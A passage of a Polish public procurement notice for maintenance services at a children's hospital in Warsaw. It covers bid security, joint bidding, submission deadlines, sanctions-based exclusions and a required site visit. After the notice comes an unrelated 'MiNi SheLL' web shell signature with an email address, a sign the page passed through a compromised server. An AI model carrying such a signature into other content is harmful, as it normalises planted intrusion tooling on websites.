ust. 4 ustawy Pzp stanowiący Załącznik nr 4<br/>do SWZ (o ile dotyczy); <br/>4) Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, że <br/>osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. <br/>Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może <br/>je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca <br/>wskaże dane umożliwiające dostęp do tych dokumentów w Oświadczeniu stanowiącym <br/>Załącznik nr 3 do SWZ.<br/>5) Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania <br/>nie wynika z dokumentów, o których mowa w punkcie poprzedzającym - Wykonawca <br/>składa pełnomocnictwo lub inny dokument potwierdzający umocowanie do <br/>reprezentowania w jego imieniu, a także o ile dotyczy, pełnomocnictwo do <br/>reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia przez Wykonawcę wadium w kwocie:<br/>KWOTA WADIUM<br/>kwota: 6000,00 zł <br/>słownie: sześć tysięcy złotych 00/100<br/>2. Wadium należy wnieść do upływu terminu składania ofert, tj. do dnia 04.07.2023 roku, <br/>do godz. 08:30<br/>Wadium, zgodnie z art. 97 ust. 7 uPzp, należy wnieść w jednej z następujących form:<br/>a. pieniądzu;<br/>b. gwarancjach bankowych; <br/>c. gwarancjach ubezpieczeniowych; <br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn. Dz. U. z 2023 r. poz. 462 z późn. zm.) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>a) Wykonawcy są zobowiązani ustanowić pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być <br/>złożone wraz z ofertą <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZGODNIE Z ZAŁ. NR 5 DO swz WZÓR UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-04 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nieklanska.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-04 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy,<br/>Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa MarketPlanet tel.<br/>+48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>2. Zamawiający informuje, że zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z<br/>2022 r. poz. 835) wykluczeniu podlega wykonawca:<br/>1) Wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) Którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) Którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.<br/>U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3.<br/>Wykonawca składając ofertę potwierdza, że nie podlega wykluczeniu w oparciu o wyżej wskazane przesłanki.<br/>Zamawiający wymaga, aby przed przygotowaniem i złożeniem oferty Wykonawca <br/>dokonał wizji lokalnej miejsc świadczenia usług. Wizję lokalną przewidziano w dni <br/>robocze (tj. od poniedziałku do piątku) nie później niż do dnia 30.06.2023 roku, w <br/>godzinach od 08.00 do 14.00 po uprzednim telefonicznym uzgodnieniu terminu z Działem <br/>Technicznym – tel. 22 50 98 379. Wykonawca będzie realizował usługę, na terenie <br/>Szpitala Dziecięcego w Warszawie, ul. Niekłańska 4/24<br/><br/>Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowych <br/>zadań zamówienia (nie dopuszcza realizacji kluczowych zadań przedmiotu zamówienia <br/>przy udziale podwykonawców). Do kluczowych zadań w realizacji niniejszego <br/>zamówienia należą:<br/> - Zapewnienie 24-godzinnej usługi typu „Interwencja serwisowa”;<br/> - Ciągła obecność na terenie Szpitala min. 1 pracownika z uprawnieniami do <br/>wykonywanych czynności konserwacyjnych i interwencyjnych od poniedziałku do piątku <br/>w godzinach od 7.00-15.00;<br/> - Wykonywanie napraw urządzeń i instalacji

Creat By MiNi SheLL
Email: jattceo@gmail.com